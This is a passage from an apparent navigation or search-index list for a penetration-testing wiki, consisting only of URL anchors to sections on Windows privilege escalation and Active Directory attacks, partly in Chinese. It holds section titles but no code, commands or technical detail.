e-escalation/index.html#from-local-service-or-network-service-to-full-privs","windows-hardening/windows-local-privilege-escalation/index.html#more-help","windows-hardening/windows-local-privilege-escalation/index.html#useful-tools","windows-hardening/windows-local-privilege-escalation/index.html#参考资料","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#滥用企业自动更新器和特权-ipc-eg-netskope-stagentsvc","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#1-通过-localhost-ipc-强制注册到攻击者服务器","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#2-hijacking-the-update-channel-to-run-code-as-system","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#3-forging-encrypted-ipc-requests-when-present","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#4-bypassing-ipc-caller-allowlists-pathname-checks","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#5-tamperprotection-friendly-injection-suspended-process--ntcontinue-patch","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#6-practical-tooling","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#7-detection-opportunities-blue-team","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#hardening-tips-for-vendors","windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.html#references","windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.html#windows-kernel-eop-token-stealing-with-arbitrary-kernel-rw","windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.html#概述","windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.html#高层步骤","windows-hardening/windows-local-privilege-escalation/arbitrary-ke
rnel-rw-token-theft.html#伪代码","windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.html#检测与缓解","windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.html#参考资料","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#滥用令牌","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#令牌","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#seimpersonateprivilege","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#seassignprimaryprivilege","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#setcbprivilege","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#sebackupprivilege","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#serestoreprivilege","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#secreatetokenprivilege","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#seloaddriverprivilege","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#setakeownershipprivilege","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#sedebugprivilege","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#检查权限","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#启用所有令牌","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#表格","windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#参考","windows-hardening/windows-local-privilege-escalation/access-tokens.html#access-tokens","windows-hardening/windows-local-p
rivilege-escalation/access-tokens.html#access-tokens-1","windows-hardening/windows-local-privilege-escalation/access-tokens.html#本地管理员","windows-hardening/windows-local-privilege-escalation/access-tokens.html#凭据用户-impersonation","windows-hardening/windows-local-privilege-escalation/access-tokens.html#令牌类型","windows-hardening/windows-local-privilege-escalation/access-tokens.html#令牌权限","windows-hardening/windows-local-privilege-escalation/access-tokens.html#参考","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#acls---daclssaclsaces","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#访问控制列表-acl","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#关键组件","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#系统与-acl-的交互","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#总结过程","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#aces","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#aces-的顺序","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#gui-示例","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#简化访问控制的解释","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#访问控制条目布局","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#访问掩码布局","windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.html#参考","windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.html#摘要","windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.html#创建恶意-msi-并获取-root","windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.html#参考","windows-hardening/windows-local-privilege-escalation/com-hijacking.html#com-hijacking","windows-hardening/windows-local-privilege-escalation/c
om-hijacking.html#搜索不存在的-com-组件","windows-hardening/windows-local-privilege-escalation/com-hijacking.html#可劫持的-task-scheduler-com-组件","windows-hardening/windows-local-privilege-escalation/com-hijacking.html#com-typelib-hijacking-script-moniker-persistence","windows-hardening/windows-local-privilege-escalation/com-hijacking.html#步骤-powershell","windows-hardening/windows-local-privilege-escalation/com-hijacking.html#参考资料","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#dll-hijacking","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#基本信息","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#常见技术","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#查找缺失的-dlls","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#利用缺失的-dlls","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#dll-搜索顺序","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#通过-rtl_user_process_parametersdllpath-强制-sideloading","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#提升权限","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#自动化工具","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#示例","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#creating-and-compiling-dlls","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#dll-proxifying","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#meterpreter","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#your-own","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#案例研究cve-2025-1729---privilege-escalation-using-tpqmassistantexe","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#漏洞详情","windows-hardening/windows-local-privileg
e-escalation/dll-hijacking/index.html#利用实现","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#攻击流程","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#缓解措施","windows-hardening/windows-local-privilege-escalation/dll-hijacking/index.html#references","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#writable-sys-path-dll-hijacking-privesc","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#introduction","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#privesc-with-dll-hijacking","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#finding-a-missing-dll","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#漏掉的-dll","windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.html#利用","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#dpapi---提取密码","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#what-is-dpapi","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#users-key-generation","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#机器系统密钥生成","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#由-dpapi-保护的数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#主密钥提取选项","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#列出-vault","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#访问-dpapi-加密数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#查找-dpapi
-加密数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#访问密钥和数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#处理可选熵third-party-entropy","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#离线破解-masterkeys-hashcat--dpapisnoop","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#访问其他机器数据","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#other-tools","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#hekatomb","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#donpapi-2x-2024-05","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#dpapisnoop","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#common-detections","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#2023-2025-vulnerabilities--ecosystem-changes","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#case-study-zscaler-client-connector--custom-entropy-derived-from-sid","windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html#参考资料","windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.html","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#integrity-levels","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#integrity-levels-1","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#integrity-levels-in-file-system","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#二进制中的完整性级别","windows-hardening/windows-local-privilege-escalation/integrity-levels.html#进程中的完整性级别","windows-hardening/windows-local-privilege-escalation/juicypotato.html#juicypotato","windows-hardening/
windows-local-privilege-escalation/juicypotato.html#juicy-potato-滥用黄金权限","windows-hardening/windows-local-privilege-escalation/juicypotato.html#compatibility-quick-notes","windows-hardening/windows-local-privilege-escalation/juicypotato.html#summary","windows-hardening/windows-local-privilege-escalation/juicypotato.html#juicy-details","windows-hardening/windows-local-privilege-escalation/juicypotato.html#usage","windows-hardening/windows-local-privilege-escalation/juicypotato.html#结语","windows-hardening/windows-local-privilege-escalation/juicypotato.html#juicypotatong-2022","windows-hardening/windows-local-privilege-escalation/juicypotato.html#示例","windows-hardening/windows-local-privilege-escalation/juicypotato.html#获取-ncexe-reverse-shell","windows-hardening/windows-local-privilege-escalation/juicypotato.html#powershell-rev","windows-hardening/windows-local-privilege-escalation/juicypotato.html#启动新的-cmd如果你有-rdp-访问","windows-hardening/windows-local-privilege-escalation/juicypotato.html#clsid-问题","windows-hardening/windows-local-privilege-escalation/juicypotato.html#检查-clsid","windows-hardening/windows-local-privilege-escalation/juicypotato.html#参考资料","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#leaked-handle-exploitation","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#介绍","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#有趣的句柄","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#进程","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#线程","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#文件键和节句柄","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#如何查看进程的句柄","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#process-hacker","windows-hardening/windows-local-privilege-escalation/leaked
-handle-exploitation.html#sysinternals-handles","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#leakedhandlesfinder","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#方法论","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#漏洞示例","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#exploit-example-1","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#exploit-example-2","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#其他工具和示例","windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.html#参考文献","windows-hardening/windows-local-privilege-escalation/msi-wrapper.html#msi-wrapper","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#named-pipe-client-impersonation","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#tldr","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#requirements-and-key-apis","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#minimal-win32-workflow-c","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#net-快速示例","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#常见触发强制手段让-system-连接到你的管道","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#roguepotato-printspoofer-sharpefspotato-godpotato","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#故障排查与注意事项","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#检测与加固","windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.html#参考","windows-hardening/windows-local-privilege-escalation/privilege-escala
tion-with-autorun-binaries.html#privilege-escalation-with-autoruns","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#wmic","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#scheduled-tasks","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#文件夹","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#注册表","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#运行","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#启动路径","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#winlogon-keys","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#策略设置","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#alternateshell","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#changing-the-safe-mode-command-prompt","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#安装的组件","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#browser-helper-objects","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#overview-of-browser-helper-objects-bhos","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#internet-explorer-扩展","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#字体驱动程序","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#打开命令","windows-hardening/windows-local-privilege-escalation/privilege-escalatio
n-with-autorun-binaries.html#图像文件执行选项","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#sysinternals","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#更多","windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#参考文献","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#roguepotato-printspoofer-sharpefspotato-godpotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#requirements-and-common-gotchas","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#快速演示","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#printspoofer","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#roguepotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#sharpefspotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#efspotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#godpotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#dcompotato","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#sigmapotato-更新的-godpotato-fork","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#检测与加固说明","windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html#参考资料","windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.html#sedebug--seimpersonate---copy-token","windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.html#seimpersonate-from-high-to-system","windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.html#代码","wind
ows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.html#错误","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#windows-c-payloads","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#添加本地管理员用户","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#uac-bypass--fodhelperexe-registry-hijack-medium--high-integrity","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#spawn-system-shell-via-token-duplication-sedebugprivilege--seimpersonateprivilege","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#内存中的-amsi--etw-patch-defence-evasion","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#创建子进程为-protected-process-light-ppl","windows-hardening/windows-local-privilege-escalation/windows-c-payloads.html#参考资料","windows-hardening/active-directory-methodology/index.html#active-directory-方法论","windows-hardening/active-directory-methodology/index.html#基本概述","windows-hardening/active-directory-methodology/index.html#kerberos-authentication","windows-hardening/active-directory-methodology/index.html#速查表","windows-hardening/active-directory-methodology/index.html#侦察-active-directory-no-credssessions","windows-hardening/active-directory-methodology/index.html#用户枚举","windows-hardening/active-directory-methodology/index.html#知道一个或多个用户名","windows-hardening/active-directory-methodology/index.html#llmnrnbt-ns-poisoning","windows-hardening/active-directory-methodology/index.html#ntlm-relay","windows-hardening/active-directory-methodology/index.html#steal-ntlm-creds","windows-hardening/active-directory-methodology/index.html#使用凭证会话-枚举-active-directory","windows-hardening/active-directory-methodology/index.html#枚举","windows-hardening/active-directory-methodology/index.html#kerberoast","windows-hardening/active-directory-methodology/index.html#remote-connexion-rdp-ssh-ftp-win-rm-etc","windows-hardening/active
-directory-methodology/index.html#local-privilege-escalation","windows-hardening/active-directory-methodology/index.html#current-session-tickets","windows-hardening/active-directory-methodology/index.html#ntlm-relay-1","windows-hardening/active-directory-methodology/index.html#在计算机共享中查找-creds--smb-shares","windows-hardening/active-directory-methodology/index.html#steal-ntlm-creds-1","windows-hardening/active-directory-methodology/index.html#cve-2021-1675cve-2021-34527-printnightmare","windows-hardening/active-directory-methodology/index.html#在拥有特权凭证会话的情况下对-active-directory-提权","windows-hardening/active-directory-methodology/index.html#hash-extraction","windows-hardening/active-directory-methodology/index.html#pass-the-hash","windows-hardening/active-directory-methodology/index.html#over-pass-the-hashpass-the-key","windows-hardening/active-directory-methodology/index.html#pass-the-ticket","windows-hardening/active-directory-methodology/index.html#credentials-reuse","windows-hardening/active-directory-methodology/index.html#mssql-abuse--trusted-links","windows-hardening/active-directory-methodology/index.html#it-assetdeployment-platforms-abuse","windows-hardening/active-directory-methodology/index.html#unconstrained-delegation","windows-hardening/active-directory-methodology/index.html#constrained-delegation","windows-hardening/active-directory-methodology/index.html#resourced-based-constrain-delegation","windows-hardening/active-directory-methodology/index.html#permissionsacls-abuse","windows-hardening/active-directory-methodology/index.html#printer-spooler-service-abuse","windows-hardening/active-directory-methodology/index.html#third-party-sessions-abuse","windows-hardening/active-directory-methodology/index.html#laps","windows-hardening/active-directory-methodology/index.html#certificate-theft","windows-hardening/active-directory-methodology/index.html#certificate-templates-abuse","windows-hardening/active-directory-methodology/index.html#post-exploitation-with-hi
gh-privilege-account","windows-hardening/active-directory-methodology/index.html#dumping-domain-credentials","windows-hardening/active-directory-methodology/index.html#privesc-as-persistence","windows-hardening/active-directory-methodology/index.html#silver-ticket","windows-hardening/active-directory-methodology/index.html#golden-ticket","windows-hardening/active-directory-methodology/index.html#diamond-ticket","windows-hardening/active-directory-methodology/index.html#certificates-account-persistence","windows-hardening/active-directory-methodology/index.html#certificates-domain-persistence","windows-hardening/active-directory-methodology/index.html#adminsdholder-group","windows-hardening/active-directory-methodology/index.html#dsrm-credentials","windows-hardening/active-directory-methodology/index.html#acl-persistence","windows-hardening/active-directory-methodology/index.html#security-descriptors","windows-hardening/active-directory-methodology/index.html#skeleton-key","windows-hardening/active-directory-methodology/index.html#custom-ssp","windows-hardening/active-directory-methodology/index.html#dcshadow","windows-hardening/active-directory-methodology/index.html#laps-persistence","windows-hardening/active-directory-methodology/index.html#forest-privilege-escalation---domain-trusts","windows-hardening/active-directory-methodology/index.html#basic-information","windows-hardening/active-directory-methodology/index.html#different-trusts","windows-hardening/active-directory-methodology/index.html#attack-path","windows-hardening/active-directory-methodology/index.html#find-external-usersgroups-with-permissions","windows-hardening/active-directory-methodology/index.html#child-to-parent-forest-privilege-escalation","windows-hardening/active-directory-methodology/index.html#external-forest-domain---one-way-inbound-or-bidirectional","windows-hardening/active-directory-methodology/index.html#外部林域---单向出站","windows-hardening/active-directory-methodology/index.html#域信任滥用缓解",
"windows-hardening/active-directory-methodology/index.html#sid-filtering","windows-hardening/active-directory-methodology/index.html#selective-authentication","windows-hardening/active-directory-methodology/index.html#ad---azure--azure---ad","windows-hardening/active-directory-methodology/index.html#一些常见防御措施","windows-hardening/active-directory-methodology/index.html#凭证保护的防御措施","windows-hardening/active-directory-methodology/index.html#实施诱饵deception技术","windows-hardening/active-directory-methodology/index.html#识别诱饵","windows-hardening/active-directory-methodology/index.html#规避检测系统","windows-hardening/active-directory-methodology/index.html#参考文献","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#滥用-active-directory-aclsaces","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#badsuccessor","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#用户上的-genericall-权限","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#组上的-genericall-权限","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#genericall--genericwrite--write-on-computeruser","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#writeproperty-on-group","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#self-self-membership-on-group","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#writeproperty-self-membership","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#forcechangepassword","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#writeowner-对组","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#genericwrite-on-user","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#genericwrite-on-group","windows-hardening/active-directory-methodology/acl-persistence-abuse/index
.html#writedacl--writeowner","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#writedaclwriteowner-快速接管-powerview","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#域内复制-dcsync","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#gpo-委派","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#gpo-委派-1","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#枚举-gpo-权限","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#滥用-gpo---new-gpoimmediatetask","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#grouppolicy-module---abuse-gpo","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#sharpgpoabuse---滥用-gpo","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#强制策略更新","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#深入解析","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#users-and-groups","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#sysvolnetlogon-logon-script-poisoning","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#定位-logon-scripts","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#验证写入访问不要相信共享列表","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#poison-a-vbscript-logon-script-for-rce","windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html#references","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#滥用-active-directory-aclsaces","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#概述","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#dmsa-到底是什么","windows-hardening/active-directory-methodo
logy/acl-persistence-abuse/BadSuccessor.html#攻击要求","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#步骤badsuccessor特权提升","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#收集所有用户密码","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#工具","windows-hardening/active-directory-methodology/acl-persistence-abuse/BadSuccessor.html#参考","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#shadow-credentials","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#intro","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#requirements","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#abuse","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#tools","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#pywhisker","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#shadowspray","windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.html#references","windows-hardening/active-directory-methodology/ad-certificates/index.html#ad-certificates","windows-hardening/active-directory-methodology/ad-certificates/index.html#introduction","windows-hardening/active-directory-methodology/ad-certificates/index.html#components-of-a-certificate","windows-hardening/active-directory-methodology/ad-certificates/index.html#special-considerations","windows-hardening/active-directory-methodology/ad-certificates/index.html#certificate-authorities-cas-in-active-directory-ad","windows-hardening/active-directory-methodology/ad-certificates/index.html#certificate-acquisition-client-certificate-request-flow","windows-hardening/active-directory-methodology/ad-certificates/index.htm
l#certificate-templates","windows-hardening/active-directory-methodology/ad-certificates/index.html#certificate-enrollment","windows-hardening/active-directory-methodology/ad-certificates/index.html#template-enrollment-rights","windows-hardening/active-directory-methodology/ad-certificates/index.html#enterprise-ca-enrollment-rights","windows-hardening/active-directory-methodology/ad-certificates/index.html#additional-issuance-controls","windows-hardening/active-directory-methodology/ad-certificates/index.html#methods-to-request-certificates","windows-hardening/active-directory-methodology/ad-certificates/index.html#certificate-authentication","windows-hardening/active-directory-methodology/ad-certificates/index.html#kerberos-authentication-process","windows-hardening/active-directory-methodology/ad-certificates/index.html#安全通道-schannel-认证","windows-hardening/active-directory-methodology/ad-certificates/index.html#ad-证书服务枚举","windows-hardening/active-directory-methodology/ad-certificates/index.html#参考资料","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#ad-cs-账户持久性","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#理解使用证书的活动用户凭证盗窃--persist1","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#使用证书获得机器持久性---persist2","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#通过证书续订扩展持久性---persist3","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#植入显式证书映射-altsecurityidentities--persist4","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#作为持久性使用的注册代理--persist5","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#2025-强证书映射强制执行对持久性的影响","windows-hardening/active-directory-methodology/ad-certificates/account-persistence.html#参考文献","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html
#ad-cs-domain-escalation","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#misconfigured-certificate-templates---esc1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#explanation","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#misconfigured-certificate-templates---esc1-explained","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#abuse","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#配置错误的证书模板---esc2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#配置错误的-enrolment-agent-模板---esc3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#易受攻击的证书模板访问控制---esc4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#易受攻击的-pki-对象访问控制---esc5","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#editf_attributesubjectaltname2---esc6","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#易受攻击的证书颁发机构访问控制---esc7","windows-harden